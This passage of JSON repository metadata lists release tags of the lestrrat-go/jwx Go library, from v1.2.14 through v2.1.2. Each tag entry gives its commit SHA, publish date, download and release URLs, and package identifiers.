.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"